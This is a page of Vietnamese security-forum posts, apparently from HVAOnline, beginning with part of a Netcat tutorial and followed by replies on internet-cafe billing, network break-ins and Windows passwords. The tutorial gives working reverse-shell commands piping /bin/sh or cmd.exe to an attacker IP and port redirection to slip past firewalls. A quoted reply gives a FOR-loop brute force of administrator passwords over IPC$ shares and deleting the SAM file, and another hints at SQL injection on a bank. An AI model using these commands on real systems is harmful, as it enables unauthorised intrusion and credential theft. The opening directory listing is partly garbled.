drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²?
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b
drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²?
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var


- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất:

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_


Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2).

Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc.
-------------------------------------------------------------------------------------
5.2 Tạo kênh sau
Cũng tương tự như telnet nghịch chuyển.

- trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn:

C:\>nc -nvv -l -p 80
listennng on [any] 80 ...


- tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell:

E:\>nc -e cmd.exe 172.16.84.1 80


Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo.

C:\>nc -nvv -l -p 80
listenning pm [any] 80 ...
connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.
E:\>


5.3 Đổi hướng cổng
Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau:

- chạy nc trên cổng bất kì:

E:\>nc -nvv -L -p 1234 -e cmd.exe
listening on [any] 1234 ...


- chạy tunnel hoặc fpipe để đổi hướng cổng

C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234


C:\>fpipe -l 53 -r 1234 127.0.0.1


tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe.

Đổi hướng cổng là một cách để đi vòng qua firewalls.


--------------------------------------------------------------------------------

6. Kết luận:
Netcat thật mạnh và là công cụ không thể thiếu

thân

A9hiphop wrote:
Máy dung hệ điều hành Windows Xp SP2 (đã cập nhật các bản vá lỗi)
Share Internet bằng dây cáp thông qua các switch.
Dùng chương trình inet để tính giờ truy cập bằng thẻ.
Mong các bác giúp đỡ 


smilie) Hi !
nếu nói như bạn thì mình nghỉ vấn đề cơ bản vẫn là nằm ở phần mềm tính tiền của bạn thôi !bạn nên xem lại phần mềm tính tiền xem,bạn thử tìm mua phần mềm Easycafe xem ,chứ nếu một máy bị ngắt kết nối mà phần mềm không thể tính tiền trong khoảng thời gian đó là phần mềm dỏm rùi
vì nếu muốn ngắt kết nối trong một thời gian có gì là khó,cách đơn giản chỉ cần rút dây mạng ra là xong hoặc nếu cấu hình và user mà bạn config không kỹ thì user chỉ cần vào dos đánh vài câu lệnh thì có thể disable được card mạng để ngắt kết nối và còn rất nhiều cách nữa
mình khuyên bạn nên xem lại phần mềm tính tiền xem và thử tìm hiểu phần mềm Easycafe ,như vậy mình thấy khả thi hơn

Look2Me wrote:
E đọc 1 hồi mà không hiểu rốt cuộc là có lỗi j, có hack được kô vậy\? 


Hi :wink: sao lại không hiểu
Ngân hàng đã bị dính SQL Inject nặng nhưng chỉ bị trước kia thôi,còn bây giờ mình cũng chưa thử
chỉ cần bạn tìm mấy cái input dạng select
sau đó run query xem user db và dùng query list table nó có các thông số về user và pass
vậy thôi
thân

Clark_kent wrote:
Em muốn thâm nhập vô máy chủ thì phải làm sao và có cách nào để mở đc ổ đĩa của máy đó rồi chỉnh sửa tùy mình
- Mong các anh tiền bối giúp đỡ em chỉ la NewBie thui  


smilie) Trời một câu hỏi bó tay hoàn toàn
bạn là newbie sao bạn không học những căn bản về sử dụng máy tính trước đi cho thành thạo còn việc xâm nhập để khi nào thành thạo rồi tính
trong khi bạn bảo muốn xâm nhập vào máy chủ mà lại không có một thông tin gì về máy chủ không có thông tin gì về mạng thì chỉ có trời mới giúp bạn được .
mình cũng nói thêm với bạn là nếu bạn vào HVA để được chỉ từ a-z về thâm nhập vào máy chủ của bạn thì bạn vào nhầm diễn đàn rồi .
mình khuyên bạn nên đọc kỹ lại các bài trên diễn đàn rồi tự mày mò,nếu bị mắc ở đâu thì post lên diễn đàn hỏi ?chứ bạn tiếp tục hỏi thế này sẽ bị "châm" đó
vài ý kiến
thân

A9hiphop wrote:
Em đang là sinh viên được giao quản lý dịch vụ Internet ở kí túc xá. Gần đây có một số hiện tượng sinh viên làm mất kết nối tạm thời trong vài phút rồi sau đó nối lại để không bị trừ tiền truy cập Internet. smilie
Em cũng không hiểu nhiều về vấn đề này nên xin mạn phép hỏi các anh thực ra cách làm việc ấy là như thế nào :?smilie và cách phòng chống nó.
smilie)  


smilie) Trời !
chỉ có vậy sao mọi người giúp bạn được
Máy ở ký túc xá của bạn đang dùng hệ điều hành gì?,Share internet bằng cách nào?,và dùng công cụ gì để share?
còn nữa quan trọng phần mềm tính tiền tên gì ?tính bằng cách nào ?
bạn cần phải xác định được những yếu tố ở trên thì mọi người mới giúp bạn được
thân

naruto_uko wrote:
Em đã thử dùng lệnh Net use rùi, nhưng khi kết nối đc với 1 IP (ko có pass) nhưng ngay dòng tip theo thì nó lại đòi mình đánh pass vào, nhưnng khi gõ trên bàn phím thì nó chẳng hiện ra cái zì cả. Zậy là sao????? 


Dear naruto_uko
khi bạn dùng net use thì còn tùy thuộc vào use của bạn thuộc nhóm nào
còn khi bạn kết nối với một IP không có pass thì khi bạn dùng net use thì máy hỏi bạn là pass administrator của máy victim .

dear boydan2003
tui add user vào nhóm admin ko dc có fải sai lệnh ko kiểm tra giúp,
cũng gõ như tren thôi ma sai.
còn nữa nếu là máy đó thuộc domain nào đó như abc.com chẳng hạn thì fải gõ làm sao ?
gửi mấy bác giúp nhé  


bạn add user vào nhóm admin nó báo lổi gì,và bạn dùng quyền gì để add
lệnh net use chỉ sử dụng với mạng Lan không thể sử dụng với abc.com được
Thân

ngoconghuy wrote:
Gửi bạn checkmin8:

Lấy mật khẩu của WInNT và Win2000

tạo một tệp tin, trong đó có chứa username và password tương ứng nhau . Ví dụ ta tạo 1 file credentials.txt :
[file: credentials.txt]
password username
admin Administrator
administrator Administrator
secret Administrator
........... .....................
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ thể :
c:\>FOR /F "tokens=1,2*" %i in (credetials.txt) do net use (tên ổ đĩa): \\server\IPC$ %i /u:%j

Lệnh này lấy 2 "từ vị" ở mỗi dòng, và lấy "từ vị" đầu cho biến %i (password), và "từ" vị thứ 2 cho biến %j trong khi sử dụng lệnh net use cho resource IPC$, IPC$ ở đây có thể là ổ C$ hay D$, còn tên ổ đĩa bạn nên lấy những ổ "ảo", nghĩa là không có trên máy ví dụ ổ H: hay I: V:
Lệnh này đã được mình test thành công !

-----------------------------------------------------------------

Có rất nhiều chương trình để lấy pass theo kiểu chọn này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool), chương trình này được sử dụng cho tất cả các PC ở class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.202.%I >> nat_output.txt


--- Checking host : 192.168.202.1


--- Obtaining list of remote NetBIOS names


--- Attempting to connect with Username: 'ADMINISTRATOR' Password:'ADMINISTRATOR'


--- Attempting to connect with Username: 'ADMINISTRATOR' Password:'GUEST'

.......


--- CONNECTED: Username: 'ADMINISTRATOR' Password" 'PASSWORD'


--- Attempting to access share: \\*SMBSERVER\TEMP


--- WARNING: Able to acess share: \\*SMBSERVER\TEMP
......
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng lệnh FOR /?


Một cách khác nhằm đoạt quyền của Administrator ở Window

Đối với Win98 : Không khó lắm , bạn vào start menu -->search--> Files and Folders , bạn tìm tất cả những file *.pwl. Sau đó Xóa những file này đi, khởi động lại máy rồi login với user là administrator , không password
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60% Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account người dùng ,... Bạn khởi động lại máy và log in với user Administrator , không có pass !

Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn so với FAT 32), bạn làm lại những bước trên, tuy nhiên, bạn cần một chương trình để đọc file của bạn trong partion ở DOS . Bạn download chương trình NTFSpro Những hướng dẫn trong chương trình này sẽ giúp bạn cài 1 boot disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi động lại với boot disk này và đã có thể thao tác với file rùi ! làm theo những bước ở phía trên nữa là xong !
 


Dear ngoconghuy
c:\>FOR /F "tokens=1,2*" %i in (credetials.txt) do net use (tên ổ đĩa): \\server\IPC$ %i /u:%j  

lệnh for trong win không thể tìm kiếm các giá trị được gán trong biến,với các giá trị mặc định là i & j

Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60% Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account người dùng ,... Bạn khởi động lại máy và log in với user Administrator , không có pass !  

đối với WIN NT trở lên nếu xóa tập tin sam trang system32 thì windows sẽ không khởi động được
một vài ý kiến
thân

delay wrote:
Hi mọi người !
Mình đang tìm hiểu nghiên cứu về các kiểu back up và phục hồi hệ thống/dữ liệu.
Các kiểu back up thì mình chỉ mới biết và hiểu về cơ chế đối với : Full backup, Increamental backup, Differential backup. Còn 1 loại Dummy back up thì mình chưa hiểu.
Anh em nào có tài liệu chuyên về các giải pháp back up thì giúp mình với.
Thanks mọi người ! 


:wink: Hi
chủ đề này trên diễn đàn rất nhiều đó,bạn tìm thử xem.nếu không thấy có thể đọc tại đây
http://www.nis.com.vn/nis/index.php?option=content&task=view&id=405&Itemid=27
thân
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|